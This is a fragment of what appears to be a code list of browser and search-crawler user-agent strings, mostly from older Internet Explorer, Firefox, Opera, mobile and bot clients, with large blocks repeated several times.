'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
